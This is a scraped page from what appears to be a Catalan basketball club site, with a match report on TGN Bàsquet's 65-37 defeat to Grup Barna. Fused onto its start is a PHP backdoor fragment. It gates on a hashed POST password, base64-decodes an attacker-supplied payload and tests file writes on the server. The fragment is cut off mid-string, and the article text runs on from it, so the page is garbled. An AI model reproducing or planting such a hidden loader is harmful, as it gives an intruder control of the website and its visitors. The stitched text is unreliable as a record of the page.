function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet encaixa una derrota en l'últim partit de la fase prèvia contra el Grup Barna (65-37) - Tgn Bàsquet Club -

El TGN Bàsquet encaixa una derrota en l’últim partit de la fase prèvia contra el Grup Barna (65-37)

By
Updated: març 9, 2022

El TGN Bàsquet no va aconseguir vèncer el rival més talentós de la lliga i acaba la primera fase quart, amb 8 victòries i 8 derrotes. Les liles sabien que s’enfrontaven a un dels equips més potents de la lliga, i contra el qual van perdre 46-67 en el partit d’anada. Tot i això, el cos tècnic assegura que les coses treballades per intentar parar el Grup Barna no van sortir. En el primer període les barcelonines van començar fent un parcial de 7-0 en els primers 5 minuts. Les liles, en canvi, tenien moltes dificultats per atacar, cosa que es demostra en la poca quantitat de punts, a la mitja part el resultat era de 35-18. A la tornada del descans les tarragonines van competir, per primera vegada en tot el partit, i van plantar cara les rivals, gràcies a la gran defensa col·lectiva. Va ser el millor moment de les del TGN que van aconseguir un parcial 11-10. Malauradament, l’últim quart va ser molt bo per a les locals que van acabar rematant el partit i ampliant encara més la diferència amb dos triples seguits en els últims minuts. El rebot era un aspecte que preocupava a l’entrenador i que les jugadores no van ser capaces de controlar. A més la intensitat defensiva del Grup Barna va ser constant cosa que va fer perdre moltes pilotes a les jugadores d’en Neila, que clarament es van veure superades.

El conjunt lila es prepara per encarar amb força la segona fase, en la qual es trobarà amb el CB Valls i el Safa Claror, falta concretar un equip ja que encara queda per jugar una jornada a l’altre grup. El següent cap de setmana les sèniors no juguen i començaran la fase per la permanència el dia 19.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *